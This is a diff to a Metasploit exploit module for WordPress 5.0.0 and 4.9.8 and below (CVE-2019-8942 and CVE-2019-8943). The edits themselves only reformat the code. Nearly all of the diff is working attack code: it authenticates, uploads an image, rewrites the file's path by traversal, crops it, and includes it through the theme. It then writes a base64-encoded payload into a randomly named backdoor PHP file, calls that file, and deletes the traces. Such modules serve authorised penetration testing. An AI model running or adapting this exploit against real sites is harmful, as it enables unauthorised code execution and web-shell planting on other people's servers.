@@ -10,10 +10,11 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
-    super(update_info(
-      info,
-      'Name'            => 'WordPress Crop-image Shell Upload',
-      'Description'     => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Crop-image Shell Upload',
+        'Description' => %q{
           This module exploits a path traversal and a local file inclusion
           vulnerability on WordPress versions 5.0.0 and <= 4.9.8.
           The crop-image function allows a user, with at least author privileges,
@@ -23,38 +24,37 @@ class MetasploitModule < Msf::Exploit::Remote
           when creating a post.
 
           This exploit module only works for Unix-based systems currently.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          =>
-      [
-        'RIPSTECH Technology',                               # Discovery
-        'Wilfried Becard <wilfried.becard@synacktiv.com>'    # Metasploit module
-      ],
-    'References'      =>
-      [
-        [ 'CVE', '2019-8942' ],
-        [ 'CVE', '2019-8943' ],
-        [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
-      ],
-      'DisclosureDate'  => '2019-02-19',
-      'Platform'        => 'php',
-      'Arch'            => ARCH_PHP,
-      'Targets'         => [['WordPress', {}]],
-      'DefaultTarget'   => 0,
-      'Notes'           =>
-      {
-        'Stability' => [ CRASH_SAFE ],
-        'Reliability' => [ REPEATABLE_SESSION ],
-        'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
-      }
-    ))
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'RIPSTECH Technology',                               # Discovery
+          'Wilfried Becard <wilfried.becard@synacktiv.com>'    # Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2019-8942' ],
+          [ 'CVE', '2019-8943' ],
+          [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
+        ],
+        'DisclosureDate' => '2019-02-19',
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [['WordPress', {}]],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
+        }
+      )
+    )
 
     register_options(
       [
         OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
         OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']),
         OptString.new('THEME_DIR', [false, 'The WordPress theme dir name (disable theme auto-detection if provided)'])
-      ])
+      ]
+    )
   end
 
   def check
@@ -78,8 +78,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_wpnonce(cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')
     res = send_request_cgi(
-      'method'    => 'GET',
-      'uri'       => uri,
+      'method' => 'GET',
+      'uri' => uri,
       'cookie' => cookie
     )
     if res && res.code == 200 && res.body && !res.body.empty?
@@ -90,11 +90,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_wpnonce2(image_id, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
     res = send_request_cgi(
-      'method'    => 'GET',
-      'uri'       => uri,
-      'cookie'    => cookie,
-      'vars_get'  => {
-        'post'   => image_id,
+      'method' => 'GET',
+      'uri' => uri,
+      'cookie' => cookie,
+      'vars_get' => {
+        'post' => image_id,
         'action' => "edit"
       }
     )
@@ -107,8 +107,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_current_theme
     uri = normalize_uri(datastore['TARGETURI'])
     res = send_request_cgi!(
-      'method'    => 'GET',
-      'uri'       => uri
+      'method' => 'GET',
+      'uri' => uri
     )
     fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty?
 
@@ -121,10 +121,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_ajaxnonce(cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
     res = send_request_cgi(
-      'method'    => 'POST',
-      'uri'       => uri,
+      'method' => 'POST',
+      'uri' => uri,
       'cookie' => cookie,
-      'vars_post'  => {
+      'vars_post' => {
         'action' => 'query-attachments',
         'post_id' => '0',
         'query[item]' => '43',
@@ -195,11 +195,11 @@ class MetasploitModule < Msf::Exploit::Remote
     upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
 
     res = send_request_cgi(
-      'method'   => 'POST',
-      'uri'      => upload_uri,
-      'ctype'    => "multipart/form-data; boundary=#{boundary}",
-      'data'     => post_data,
-      'cookie'   => cookie
+      'method' => 'POST',
+      'uri' => upload_uri,
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => post_data,
+      'cookie' => cookie
     )
     fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty?
     print_good("Image uploaded")
@@ -213,10 +213,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def image_editor(img_name, ajax_nonce, image_id, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
     res = send_request_cgi(
-      'method'    => 'POST',
-      'uri'       => uri,
+      'method' => 'POST',
+      'uri' => uri,
       'cookie' => cookie,
-      'vars_post'  => {
+      'vars_post' => {
         'action' => 'image-editor',
         '_ajax_nonce' => ajax_nonce,
         'postid' => image_id,
@@ -236,10 +236,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
     res = send_request_cgi(
-      'method'   => 'POST',
-      'uri'      => uri,
+      'method' => 'POST',
+      'uri' => uri,
       'cookie' => cookie,
-      'vars_post'  => {
+      'vars_post' => {
         '_wpnonce' => wpnonce2,
         'action' => 'editpost',
         'post_ID' => image_id,
@@ -251,10 +251,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def crop_image(image_id, ajax_nonce, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
     res = send_request_cgi(
-      'method'   => 'POST',
-      'uri'      => uri,
+      'method' => 'POST',
+      'uri' => uri,
       'cookie' => cookie,
-      'vars_post'  => {
+      'vars_post' => {
         'action' => 'crop-image',
         '_ajax_nonce' => ajax_nonce,
         'id' => image_id,
@@ -271,8 +271,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def include_theme(shell_name, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')
     res = send_request_cgi(
-      'method'   => 'POST',
-      'uri'      => uri,
+      'method' => 'POST',
+      'uri' => uri,
       'cookie' => cookie
     )
     if res && res.code == 200 && res.body && !res.body.empty?
@@ -283,11 +283,11 @@ class MetasploitModule < Msf::Exploit::Remote
       post_title = Rex::Text.rand_text_alpha(10)
       uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
       res = send_request_cgi(
-        'method'   => 'POST',
-        'uri'      => uri,
+        'method' => 'POST',
+        'uri' => uri,
         'cookie' => cookie,
-        'vars_post'  => {
-          '_wpnonce'=> wpnonce2,
+        'vars_post' => {
+          '_wpnonce' => wpnonce2,
           'action' => 'editpost',
           'post_ID' => post_id,
           'post_title' => post_title,
@@ -305,8 +305,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # Test if base64 is on target
     test_string = 'YmFzZTY0c3BvdHRlZAo='
     res = send_request_cgi!(
-      'method'   => 'GET',
-      'uri'      => uri,
+      'method' => 'GET',
+      'uri' => uri,
       'cookie' => cookie,
       'vars_get' => {
         'p' => post_id,
@@ -320,8 +320,8 @@ class MetasploitModule < Msf::Exploit::Remote
     @backdoor = Rex::Text.rand_text_alpha(10)
     encoded = Rex::Text.encode_base64(payload.encoded)
     res = send_request_cgi!(
-      'method'   => 'GET',
-      'uri'      => uri,
+      'method' => 'GET',
+      'uri' => uri,
       'cookie' => cookie,
       'vars_get' => {
         'p' => post_id,
@@ -331,9 +331,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty?
     send_request_cgi(
-      'method'  =>  'GET',
-      'uri'     =>  normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php"),
-      'cookie'  =>  cookie
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php"),
+      'cookie' => cookie
     )
   end
 
@@ -341,10 +341,10 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Attempting to clean up files...')
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
     res = send_request_cgi(
-      'method'    => 'POST',
-      'uri'       => uri,
-      'cookie'    => cookie,
-      'vars_post'  => { 'action' => "query-attachments" }
+      'method' => 'POST',
+      'uri' => uri,
+      'cookie' => cookie,
+      'vars_post' => { 'action' => "query-attachments" }
     )
 
     fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty?
@@ -353,22 +353,22 @@ class MetasploitModule < Msf::Exploit::Remote
     delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
     for i in (0...6).step(2)
       res = send_request_cgi(
-        'method'    => 'POST',
-        'uri'       => uri,
-        'cookie'    => cookie,
-        'vars_post'  => {
-            'action' => "delete-post",
-            'id'     => infos[i],
-            '_wpnonce' => infos[i+1]
+        'method' => 'POST',
+        'uri' => uri,
+        'cookie' => cookie,
+        'vars_post' => {
+          'action' => "delete-post",
+          'id' => infos[i],
+          '_wpnonce' => infos[i + 1]
         }
       )
     end
 
     uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php')
     res = send_request_cgi(
-      'method'    => 'GET',
-      'uri'       => uri1,
-      'cookie'    => cookie
+      'method' => 'GET',
+      'uri' => uri1,
+      'cookie' => cookie
     )
 
     if res && res.code == 200 && res.body && !res.body.empty?
@@ -377,24 +377,24 @@ class MetasploitModule < Msf::Exploit::Remote
       uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
 
       res = send_request_cgi(
-        'method'    => 'GET',
-        'uri'       => uri2,
-        'cookie'    => cookie,
-        'vars_get'  => {
-          'post'     => post_id,
-          'action'   => 'trash',
+        'method' => 'GET',
+        'uri' => uri2,
+        'cookie' => cookie,
+        'vars_get' => {
+          'post' => post_id,
+          'action' => 'trash',
           '_wpnonce' => post_nonce
         }
       )
 
       fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302
       res = send_request_cgi(
-        'method'    => 'GET',
-        'uri'       => uri1,
-        'cookie'    => cookie,
-        'vars_get'  => {
+        'method' => 'GET',
+        'uri' => uri1,
+        'cookie' => cookie,
+        'vars_get' => {
           'post_status' => "trash",
-          'post_type'   => 'post',
+          'post_type' => 'post',
           '_wpnonce' => post_nonce
         }
       )
@@ -404,12 +404,12 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce
 
         send_request_cgi(
-          'method'    => 'GET',
-          'uri'       => uri2,
-          'cookie'    => cookie,
-          'vars_get'  => {
-            'post'     => post_id,
-            'action'   => 'delete',
+          'method' => 'GET',
+          'uri' => uri2,
+          'cookie' => cookie,
+          'vars_get' => {
+            'post' => post_id,
+            'action' => 'delete',
             '_wpnonce' => nonce
           }
         )
